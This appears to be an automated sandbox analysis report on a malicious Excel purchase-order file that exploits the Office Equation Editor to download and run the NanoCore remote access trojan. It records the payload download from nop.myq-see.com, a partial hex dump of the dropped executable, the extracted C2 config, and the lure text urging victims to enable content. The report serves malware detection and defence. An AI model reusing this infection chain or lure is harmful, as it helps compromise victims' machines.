Analysis Report PO-FRE590164.xlsx

AV Detection:

Found malware configuration

Source: vbc.exe.2920.8.memstr

Malware Configuration Extractor: NanoCore {"C2: ": ["127.0.0.1:4009"], "Version: ": "NanoCore Client, Version=1.2.2.0"}

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Virustotal: Detection: 35%			Perma Link
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exe	Virustotal: Detection: 35%			Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\TrXHdHpWh.exe	Virustotal: Detection: 35%			Perma Link
Source: C:\Users\user\AppData\Roaming\TrXHdHpWh.exe	ReversingLabs: Detection: 26%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: PO-FRE590164.xlsx	Virustotal: Detection: 34%			Perma Link
Source: PO-FRE590164.xlsx	ReversingLabs: Detection: 23%

Yara detected Nanocore RAT

Source: Yara match	File source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2380016596.00000000020B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY
Source: Yara match	File source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\TrXHdHpWh.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 8.2.vbc.exe.530000.3.unpack	Avira: Label: TR/NanoCore.fadte
Source: 8.2.vbc.exe.400000.1.unpack	Avira: Label: TR/Dropper.Gen
Source: 12.2.smtpsvc.exe.400000.0.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe

Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Compliance:

Uses new MSVCR Dlls

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: nop.myq-see.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.23.207.63:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 198.23.207.63:80

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 127.0.0.1:4009

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Jan 2021 08:22:02 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/8.0.0Last-Modified: Mon, 25 Jan 2021 11:20:36 GMTETag: "bee00-5b9b7ba28300e"Accept-Ranges: bytesContent-Length: 781824Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 84 a9 0e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 54 0a 00 00 98 01 00 00 00 00 00 be 72 0a 00 00 20 00 00 00 80 0a 00 00 00 00 11 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 0c 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 72 0a 00 4f 00 00 00 00 80 0a 00 50 95 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0c 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 52 0a 00 00 20 00 00 00 54 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 50 95 01 00 00 80 0a 00 00 96 01 00 00 56 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 0c 00 00 02 00 00 00 ec 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 72 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 ec 00 00 64 ab 00 00 03 00 00 00 16 00 00 06 44 98 01 00 28 da 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 1c 00 00 0a 2a 26 00 02 28 1d 00 00 0a 00 2a ce 73 1e 00 00 0a 80 01 00 00 04 73 1f 00 00 0a 80 02 00 00 04 73 20 00 00 0a 80 03 00 00 04 73 21 00 00 0a 80 04 00 00 04 73 22 00 00 0a 80 05 00 00 04 2a 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 23 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 24 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 25 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 26 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 27 00 00 0a 0a 2b 00 06 2a 26 00 02 28 28 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 29 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 2a 00 00 0a 6f 2b 00 00 0a 73 2c 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /win/Vbb.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nop.myq-see.comConnection: Keep-Alive

Downloads files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F36B41B0.emf

Jump to behavior

Downloads files from webservers via HTTP

Source: global traffic

HTTP traffic detected: GET /win/Vbb.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nop.myq-see.comConnection: Keep-Alive

Performs DNS lookups

Source: unknown

DNS traffic detected: queries for: nop.myq-see.com

Urls found in memory or binary data

Source: vbc.exe, 00000004.00000002.2175017889.0000000005150000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2382084526.0000000005280000.00000002.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2208244482.0000000005290000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2169962505.00000000023C1000.00000004.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2205013138.0000000002131000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000004.00000002.2175017889.0000000005150000.00000002.00000001.sdmp, vbc.exe, 00000008.00000002.2382084526.0000000005280000.00000002.00000001.sdmp, smtpsvc.exe, 00000009.00000002.2208244482.0000000005290000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: F36B41B0.emf.0.dr	String found in binary or memory: http://www.day.com/dam/1.0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Installs a raw input device (often for capturing keystrokes)

Source: vbc.exe, 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Source: Yara match	File source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2380016596.00000000020B1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY
Source: Yara match	File source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY
Source: Yara match	File source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000008.00000002.2379792375.0000000000520000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: smtpsvc.exe PID: 2264, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: vbc.exe PID: 2920, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: vbc.exe PID: 2688, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: smtpsvc.exe PID: 1336, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.vbc.exe.520000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.vbc.exe.530000.3.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 8.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 8.2.vbc.exe.530000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.2.smtpsvc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: Screenshot number: 4	Screenshot OCR: Enable Editing from the , , yellow bar above 20 ' This document is 21 3. Once you have enabled
Source: Screenshot number: 4	Screenshot OCR: Enable Content from the yellow bar above 23 24 25 26 27 28 0 29 . 30 31 32 33 34 35 3

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Vbb[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76E20000 page execute and read and write			Jump to behavior
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Memory allocated: 76D20000 page execute and read and write			Jump to behavior

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B19C2		4_2_002B19C2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B1CB0		4_2_002B1CB0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B3D28		4_2_002B3D28
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B9D80		4_2_002B9D80
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B1F68		4_2_002B1F68
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B9D70		4_2_002B9D70
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B3F70		4_2_002B3F70
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B1F58		4_2_002B1F58
Source: C:\Users\Public\vbc.exe	Code function: 8_2_001EC0F0		8_2_001EC0F0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_001E43A0		8_2_001E43A0
Source: C:\Users\Public\vbc.exe	Code function: 8_2_001EB4D8		8_2_001EB4D8
Source: C:\Users\Public\vbc.exe	Code function: 8_2_001E3788		8_2_001E3788
Source: C:\Users\Public\vbc.exe	Code function: 8_2_001EC1AE		8_2_001EC1AE
Source: C:\Users\Public\vbc.exe	Code function: 8_2_001EC9C8		8_2_001EC9C8
Source: C:\Users\Public\vbc.exe	Code function: 8_2_001E4458		8_2_001E4458
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 9_2_003F19C2		9_2_003F19C2
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 9_2_003F1CB0		9_2_003F1CB0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 9_2_003F3D28		9_2_003F3D28
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 9_2_003F9D80		9_2_003F9D80
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 9_2_003F1F68		9_2_003F1F68
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 9_2_003F9D70		9_2_003F9D70
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 9_2_003F3F80		9_2_003F3F80
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_003F43A0		12_2_003F43A0
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_003F3788		12_2_003F3788
Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe	Code function: 12_2_003F4458		12_2_003F4458

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: PO-FRE590164.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

PE file contains strange resources

Source: Vbb[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: TrXHdHpWh.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: smtpsvc.exe.8.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Yara signature match

Source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000002.2379743753.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2217649991.0000000003239000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2170837630.000000000367A000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2205759435.00000000033EA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000C.00000002.2217307442.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000002.2379798329.0000000000530000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000009.00000002.2205386626.0000000003139000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000C.00000002.2217597848.0000000002231000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000002.2380561005.00000000030F9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000008.00000002.2379792375.0000000000520000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000008.00000002.2379792375.0000000000520000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000004.00000002.2170352456.00000000033C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
